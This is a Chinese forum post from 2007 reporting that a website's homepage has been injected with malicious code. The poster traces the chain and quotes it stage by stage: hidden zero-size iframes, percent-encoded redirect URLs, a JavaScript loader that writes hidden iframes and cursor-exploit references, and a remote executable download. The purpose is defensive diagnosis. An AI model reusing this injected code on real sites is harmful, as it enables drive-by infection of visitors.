打印

管理员进来看下,主页被挂马了.

effenberg

喆服天使

Rank: 4

～谢绝勾引！

发短消息
加为好友
当前离线

1^# 大中小发表于 2007-4-21 10:57 只看该作者

管理员进来看下,主页被挂马了.

刚刚上了下主页h**p://www.davidcn.com,杀软件报毒,怀疑主页被挂马了.

下载主页index.html来看,发现有 <iframe src=h**p://www.ll78.cn/mm\mm.htm width=100 height=0></iframe>

下载这个mm.htm来看.

内容是:

引用:

<IfrAmE src=h**p://%77%77%77%2E%6D%6D%6D%6F%6F%6F%2E%63%6F%6D/pda/1.htm width=100 height=0></IfrAmE>

<iframe src="h**p://qq.520sf.org/8xz/ok.htm" width="100" height="0"> </iframe>

<script src='http://s63.cnzz.com/stat.php?id=462954&web_id=462954' language='JavaScript' charset='gb2312'></script>

下载ok.htm
内容：

引用:

<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
<title>mobile phone</title>
</head>
<body>
<script id="advjs" src="h**p://w.vvcyin.com/adv.js?showmatrix_num=041"></script>
<iframe src=h**p://qq.520sf.org/8xz/888.htm width=100 height=0 frameborder=0></iframe>
<iframe height=0 width=0 src="h**p://www.520sf.org/xz/06014.htm"></iframe>

</body>
</html>
<script language="javascript" src="http://count34.51yes.com/click.aspx?id=342122886&logo=1"></script>

<script type="text/jscript">function init() { document.write(Date());}window.onload = init;</script>

h**p://www.520sf.org/xz/06014.htm这个不用看，就是利用MS 06-14漏洞了．就没下载来看了．

下载h**p://w.vvcyin.com/adv.js看了下,
内容:

引用:

//读娶src的对象
var v = document.getElementById("advjs");
//读娶src的参数
var u_num = getUrlParameterAdv("showmatrix_num",v.getAttribute('src'));

document.write("<iframe src=\"http://w.vvcyin.com/1/"+u_num+".htm\" width=\"0\" height=\"0\" frameborder=\"0\"></iframe>");
document.writeln("<!DOCTYPE HTML PUBLIC \"-\/\/W3C\/\/DTD HTML 4.0 Transitional\/\/EN\">");
document.writeln("<HTML><HEAD>");
document.writeln("<META http-equiv=Content-Type content=\"text\/html; charset=big5\">");
document.writeln("<META content=\"MSHTML 6.00.2900.3059\" name=GENERATOR><\/HEAD>");
document.writeln("<BODY> ");
document.writeln("<DIV style=\"CURSOR: url(\'http:\/\/w.vvcyin.com\/417.js\')\">");
document.writeln("<DIV ");
document.writeln("style=\"CURSOR: url(\'http:\/\/w.vvcyin.com\/ban.js\')\"><\/DIV><\/DIV><\/BODY><\/HTML>")

//分析src的参数函数
function getUrlParameterAdv(asName,lsURL){

loU = lsURL.split("?");
if (loU.length>1){

  var loallPm = loU[1].split("&");

  for (var i=0; i<loallPm.length; i++){
var loPm = loallPm.split("=");
if (loPm[0]==asName){
if (loPm.length>1){
   return loPm[1];
}else{
   return "";
}
}
  }
}
return null;
}

("<DIV style=\"CURSOR: url(\'http:\/\/w.vvcyin.com\/417.js\')\">");
("style=\"CURSOR: url(\'http:\/\/w.vvcyin.com\/ban.js\')\"><\/DIV><\/DIV><\/BODY><\/HTML>")

指针网马,利用最近的ANI漏洞.

上面那个h**p://%77%77%77%2E%6D%6D%6D%6F%6F%6F%2E%63%6F%6D/pda/1.htm

解密后得到：h**p://www.mmmooo.com/pda/1.htm

内容是:
引用:

<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=US-ASCII" />
<title>爱恋千雪</title>
</head><body>
碱矬泸轲艟爦奸骝犴鍫篁憬集殒蜥礤緺娂矬泸轲艟娂纳譅篝褰⒚找酉液狌蜢轲螬⒕集纳志娂筱蜷痿狋褰Ⅳ屮舣牦泸轲簪炬躅泗轱顮轭轸ī狖犱镢蹴孱舢黩轸濞ⅱ┗轭滹鳟镱祜徜牻犻铋艋集筱蜷痿?
</body></html>
<IfrAmE src=http://%77%77%77%2E%6D%6D%6D%6F%6F%6F%2E%63%6F%6D/pda/1.htm width=100 height=0></IfrAmE>
<IfrAmE src=http://%77%77%77%2E%6D%6D%6D%6F%6F%6F%2E%63%6F%6D/pda/1.htm width=100 height=0></IfrAmE>
<IFrAmE src=HTTP://%6C%6C%38%30%2E%63%6F%6D/v width=100 height=0></IFrAmE><IfrAmE src=http://%77%77%77%2E%6D%6D%6D%6F%6F%6F%2E%63%6F%6D/pda/1.htm width=100 height=0></IfrAmE>
<IfrAmE src=http://%77%77%77%2E%6D%6D%6D%6F%6F%6F%2E%63%6F%6D/pda/1.htm width=100 height=0></IfrAmE>
<IfrAmE src=http://%77%77%77%2E%6D%6D%6D%6F%6F%6F%2E%63%6F%6D/pda/1.htm width=100 height=0></IfrAmE>
<IfrAmE src=http://%77%77%77%2E%6D%6D%6D%6F%6F%6F%2E%63%6F%6D/pda/1.htm width=100 height=0></IfrAmE>
<IfrAmE src=http://%77%77%77%2E%6D%6D%6D%6F%6F%6F%2E%63%6F%6D/pda/1.htm width=100 height=0></IfrAmE>
<IfrAmE src=http://%77%77%77%2E%6D%6D%6D%6F%6F%6F%2E%63%6F%6D/pda/1.htm width=100 height=0></IfrAmE>
<IfrAmE src=http://%77%77%77%2E%6D%6D%6D%6F%6F%6F%2E%63%6F%6D/pda/1.htm width=100 height=0></IfrAmE>
<IfrAmE src=http://%77%77%77%2E%6D%6D%6D%6F%6F%6F%2E%63%6F%6D/pda/1.htm width=100 height=0></IfrAmE>
<IfrAmE src=http://%77%77%77%2E%6D%6D%6D%6F%6F%6F%2E%63%6F%6D/pda/1.htm width=100 height=0></IfrAmE>
<IfrAmE src=http://%77%77%77%2E%6D%6D%6D%6F%6F%6F%2E%63%6F%6D/pda/1.htm width=100 height=0></IfrAmE>
<IfrAmE src=http://%77%77%77%2E%6D%6D%6D%6F%6F%6F%2E%63%6F%6D/pda/1.htm width=100 height=0></IfrAmE>
<IfrAmE src=http://%77%77%77%2E%6D%6D%6D%6F%6F%6F%2E%63%6F%6D/pda/1.htm width=100 height=0></IfrAmE>
<IfrAmE src=http://%77%77%77%2E%6D%6D%6D%6F%6F%6F%2E%63%6F%6D/pda/1.htm width=100 height=0></IfrAmE>
<IfrAmE src=http://%77%77%77%2E%6D%6D%6D%6F%6F%6F%2E%63%6F%6D/pda/1.htm width=100 height=0></IfrAmE>
<IfrAmE src=http://%77%77%77%2E%6D%6D%6D%6F%6F%6F%2E%63%6F%6D/pda/1.htm width=100 height=0></IfrAmE>
<IfrAmE src=http://%77%77%77%2E%6D%6D%6D%6F%6F%6F%2E%63%6F%6D/pda/1.htm width=100 height=0></IfrAmE>
下载h**p://www.yxgm78.com/xx/xx.exe

并且不断的挂自己上去，汗……

太多了,不写了,管理员处理一下吧.累!

[ 本帖最后由 effenberg 于 2007-4-21 11:05 编辑 ]